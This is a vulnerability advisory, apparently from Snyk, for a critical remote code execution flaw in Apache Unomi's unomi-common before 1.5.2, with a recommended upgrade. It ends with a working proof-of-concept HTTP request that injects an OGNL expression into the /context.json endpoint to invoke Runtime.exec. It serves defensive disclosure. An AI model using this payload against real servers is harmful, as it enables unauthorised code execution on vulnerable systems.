Remote Code Execution (RCE) Affecting org.apache.unomi:unomi-common Open this link in a new tab package, versions [,1.5.2)


0.0
critical
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    Low

  • Confidentiality

    High

  • Integrity

    High

  • Availability

    High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id

    SNYK-JAVA-ORGAPACHEUNOMI-1045349

  • published

    25 Nov 2020

  • disclosed

    25 Nov 2020

  • credit

    Eugene Rojavski

How to fix?

Upgrade org.apache.unomi:unomi-common to version 1.5.2 or higher.

Overview

org.apache.unomi:unomi-common is a package that stores user profile information and is mostly used to provide a backend server for A/B testing and personalization.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). It is possible to inject malicious OGNL or MVEL scripts into the /context.json public endpoint.

PoC

POST /context.json HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json
Content-Length: 200
 
 
{"personalizations":[{"id" : "test","strategy":"matching-first",strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{propertyName":"(#runtimeclass=#this.getClass().forName(\"java.lang.Runtime\")).(#getruntimemethod=#runtimeclass.getDeclaredMethods().{^#this.name.equals(\"getRuntime\")}[0]).(rtobj=#getruntimemethod.invoke(null,null)).(#execmethod=#runtimeclass.getDeclaredMethods().{? #this.name.equals(\"exec\")}.{? #this.getParameters()[0].getType().getName().equals(\"java.lang/String\")}.{? #this.getParameters().length<2[0]).(#execmethod.invoke(#rtobj,\" touch /tmp/POC\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"demo-session-id"}